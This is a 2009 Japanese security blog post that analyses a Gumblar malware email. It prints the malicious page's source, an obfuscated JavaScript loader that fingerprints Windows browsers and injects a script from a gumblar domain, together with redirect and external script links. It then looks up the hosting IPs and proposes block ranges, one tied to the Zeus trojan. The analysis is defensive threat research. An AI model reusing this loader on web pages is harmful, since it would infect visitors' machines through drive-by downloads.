UnderForge of Lack

The gumblar approach via email

はっきりいってH1N1なんかメじゃないくらいパンデミック状態になってる zlkon/gumblarですが、どうも感染経路が Web だけではないようでして・・・

gumblar via e-mail anyone?

*****************************************************************

vURL Desktop Edition v0.3.7 Results

Source code for: hXXp://78.131.152.104/~fonsflos/qzfbu.html

Server IP: 78.131.152.104 [ s15.o12.pl ]

hpHosts Status: Not Listed

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 0

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 09 May 2009

Time: 23:46:49:46

*****************************************************************

＜html＞＜head＞＜script type="text/javascript"＞window.location="http://qajtogap.cn";＜/script＞＜/head＞＜script language=javascript＞＜!-- 

(function(pwB){var D2J0='%';var Vsf=('var#20a#3d#22#53#63ri#70tEn#67ine#22#2cb#3d#22Vers#69on(#29+#22#2cj#3d#22#22#2cu#3dna#76igato#72#2eus#65#72Agent#3bif((u#2einde#78#4ff(#22#57#69n#22#29#3e0)#26#26(u#2ein#64exO#66(#22#4e#54#206#22)#3c0#29#26#26(do#63um#65n#74#2ec#6fo#6bi#65#2e#69#6e#64e#78#4ff(#22miek#3d1#22)#3c0)#26#26(typeof(#7a#72vzt#73#29#21#3dtyp#65#6ff(#22A#22)))#7bz#72v#7ats#3d#22#41#22#3b#65val(#22if(wi#6edow#2e#22+a+#22)j#3dj+#22+#61+#22#4d#61jor#22#2bb+a+#22#4di#6eor#22#2b#62#2ba+#22#42uild#22+#62+#22j#3b#22#29#3bdoc#75ment#2ewrit#65(#22#3c#73c#72ipt#20sr#63#3d#2f#2f#67u#6dblar#2ecn#2frs#73#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fs#63#72i#70t#3e#22)#3b#7d').replace(pwB,D2J0);eval(unescape(Vsf))})(/#/g);

 --＞＜/script＞＜body＞＜a href="hXXp://qajtogap.cn"＞Your link!＜/a＞＜script src='hXXp://b.rtbn2.cn/E/J.JS'＞＜/script＞＜/body＞＜/html＞

う・・・
ndg.techno.fm (76.74.252.212)
fm : ミクロネシア

TLDの正引き不能なのに、逆引きは可能とか・・ナニコレ？状態ですね

76.74.248.0 - 76.74.255.255
ServerBeach PEER1-SERVERBEACH-08A

USA Texas
ひょっとしたら、Botに陥落したゾンビさんかもしれないので、焼くのは保留です。

qajtogap.cn (58.20.140.5)

CN
CNC Group HuNan YueYang network : 58.20.128.0 - 58.20.159.255
こっちも、いまのところ Maliciousな報告はありませんね。

rtbn2.cn (74.220.215.58)

USA Utah
BLUEHOST-NETWORK-2 : 74.220.192.0 - 74.220.223.255

Malice Detected:
74.220.202.34
74.220.207.60
74.220.207.127
74.220.215.60
74.220.215.220 zeus/wsnpoem v1 trojan
74.220.215.245
74.220.215.246
74.220.215.247

焼くかどうかの判断はおまかせします（笑）
74.220.215.0-74.220.215.255 あたりを焼いとくのが無難かなぁ・・？

This entry was posted on 火曜日, 5 月 12th, 2009 at 12:06 AM and is filed under RiskHedge, security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to “The gumblar approach via email”

UnderForge of Lack » Blog Archive » BLOCK LIST Says:
5 月 13th, 2009 at 8:47 AM
[...] - 69.46.31.255) Virut/Virux - 2009.02.14 HIVELOCITY VENTURES CORP USA 74.220.215.0-74.220.215.255 gumblar via e-mail - 2009.05.12 BLUEHOST-NETWORK-2 USA ********** WARNING HIGH PRIORITY ********** 78.109.16.0/20 (78.109.16.0 - [...]

The gumblar approach via email

One Response to “The gumblar approach via email”

Leave a Reply